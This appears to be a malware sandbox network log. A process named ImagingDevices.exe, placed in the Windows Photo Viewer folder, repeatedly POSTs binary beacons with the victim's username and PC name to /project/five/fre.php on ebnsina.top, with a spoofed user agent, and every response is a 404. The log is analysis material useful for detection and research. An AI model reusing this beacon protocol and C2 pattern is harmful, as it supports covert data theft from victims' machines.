Apr 3, 2024 06:38:08.323491096 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:08.766911983 CEST	621	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:08 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CvDlldVNowtegic2DEuRMOZIIFnPO6qbuEVw5UfvExKg%2FKU4Dr7zpVMsc5U5Hjo50jRfSRmjRxcOEvJ44cwdj8%2FoUY9CV0eOh8qkJn5UAPOgUlnJFUz2pRI03fSCxg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65e0daca74960-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	49794	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:09.042243004 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:09.167139053 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:09.607609987 CEST	625	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:09 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zyLZxBaLDN8gstiKZUELS1rteGK0P9I1RcA1LiLvN0SAIiOT5rkDEW%2Fg1MwPij%2FZljSOXqD3IStMgvpMqwVE21OyR%2BFl24vmzK4phjleRrr3PEmZv0u9Rs%2BAMoP99A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65e12ee4d8d9c-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	49795	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:09.892412901 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:10.016803026 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:10.445008993 CEST	625	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:10 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CHMDU8dBHTjQA1IZgh1BEc%2Fir5vNS6WYJfJSmRu3eZuxAuDqyWNP%2FCaiGaIMkv%2F4y3N47yZkks6lN4FZpdoOP0iVI5014b9ZYIR1YfkkXoo3oP42lw8pykHXKc%2BwpQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65e183e16d9b9-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	49796	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:10.724951982 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:10.850409031 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:11.145678043 CEST	625	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:11 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B5VhH5gwdMGVL6tyW6uTZ5Kmalp9ePuPiTDx%2BUE0E73ZlSIUVpjZ%2BHlKAiUBdzOrTYG8VR9lnFMzCExQWmcUBdiRHdG4AAszxoLriqzTa%2FdoKut4k4QtOzVMX4G3BA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65e1d6c9f5c7d-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	49797	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:11.400710106 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:11.525583029 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:11.955082893 CEST	631	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:11 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CvRGnjU%2F1rT8WxZ3%2FQ4HVnRsFkL1NjrAxFr%2BHrwj4OO6oqkbzkrdWY7H0u1gm5EFqp5wCCTq%2BXQgZ0gBDKp8%2BRX%2Fh%2BAb8ikC81Zry0n9riiE8Z0j90Va2oZuaF3hmQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65e21aaebdb05-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	49798	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:12.218805075 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:12.343585968 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:12.639208078 CEST	617	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:12 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q4JasKRCKI3DyQ9E8BFgjuvkHHEWOojupJXkl5HVCCaeseegZ6gzR58U7DWVs7CxwfZn5bzZ6MWyMEyebgiLabRlaqdDwyZkdVQQsKdLUvJAqh0KHsm5Rgg6KwI26A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65e26cc8fd9b1-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	49799	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:12.911561966 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:13.036227942 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:13.334644079 CEST	625	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:13 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=23p%2FXcZUjoGg0UXn%2ByY3i4UdaRp9buAX4bYehUdu6A5SIPHDddcwvrqD9V%2BgcugqjvVTSPgUXTPMUB3LPw%2Bq71BrDRbqDUjfFvm8gecHxcoVIquSNpcTz5g3fZvobw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65e2b1bb20325-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	49800	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:13.658000946 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:13.782311916 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:14.072319031 CEST	623	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:14 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BNRVHKlMek4UctBRYPzAvojSZ2ZYlufJSRFykJ6LG99AdYpAvF4uXIcHiXs4waQvn%2BALEMs2sGEOBeJwmhEh4HN7v2Znb6yXWaWf%2B72cWNvvM6vaZlJ9mDaz5EJBNg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65e2fbda38db8-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	49801	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:14.340653896 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:14.465980053 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:14.900976896 CEST	623	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:14 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KreIm%2BEDvNcEJd4wSSYbJbL65wmogib6ZtflI9uY1%2FZjt2HVI0DUecgmlzSCZy8qm3xR1oepDNwDvW3shbGzkfFr%2FrWS7l30neZueCNg8SYV7thGWJSYZmbmp5i5cQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65e3409525c6b-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	49802	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:15.179954052 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:15.304460049 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:15.592637062 CEST	627	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:15 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L4%2F1I65Zgnb4EQhg6U%2F8sgO1%2B0OOSQNH2XPT1SB8Wz3znbSQ5Eezg3GVQyh8D94RgXQU05XyeVxq5HlbNkvba5pREu7s8JUnU0M8K17mGJdi%2BNxE71KZ9T%2FXl18f3Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65e394fca2588-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	49803	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:15.873778105 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:16.002515078 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:16.293138981 CEST	625	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:16 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MV8uBUHVHzPjzS3WR9KqfK4G412hBEvKwXVWdRtaLFJLGnmbThHT4ArNRTtvFO0hGAp4TU%2Bn%2BIWjvo%2FbuY7khlkmWUtVM3y7oviZMjRrtv8j%2BlZtTRMTy3StQpiixA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65e3d9b6a0359-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	49804	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:16.574817896 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:16.699525118 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:16.999825954 CEST	629	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:16 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FD1XcK5ahHMFWkFRLqD4zDE%2F0bLsLc%2FxH8e75vAqDl%2BkvRiO0rsApxSnahCHveZj6LgPcs7taxqkK3VFCu87WQOONpV0KOQnm%2BmKiWHhL1cS%2Fejb61Pgjbgu6gI0OQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65e41fcc8749e-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	49805	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:17.269664049 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:17.397470951 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:17.697709084 CEST	627	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:17 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BYX1eylJOSduQyaJgndzmLBG5DORxCRX1anEHTPMuZI5%2BmDMtgOovc4nogrV%2FbU21XmTX4LcV882YTBczX4xG10l9C%2FYsgTiX%2BpyN0hHbj8MJJka%2FjYhQF5EhfFm4g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65e465ea567d5-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	49806	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:17.972593069 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:18.097440004 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:18.401093006 CEST	631	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:18 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IaeszKFyN2wn%2B7j77e703KRZLQ%2FgAAGXPyNcZpw1nIlEShrh0R9Pi1rHk%2Bii%2FFqu1cPljQ0xJFfVGwb0fZYnlA3lB%2B9saSXjvR81Z4Z%2Bl8f%2FZzjw0mzzJfT6gWPF0w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65e4ab8279ae9-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	49807	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:18.685116053 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:18.810034990 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:19.107027054 CEST	621	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:19 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vWmatv0UDP9SzvubMAIJJXF2I1qPV9rdDh4FuqbhqwPgssOC7txEXJVY1luxAigtsgB2d4ZdRteL5POA1pUbtemj3AoZdAjcAFKMoX7P0E6VJ5%2BEM2gX0pP%2BF8kBSA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65e4f2df5333d-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	49808	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
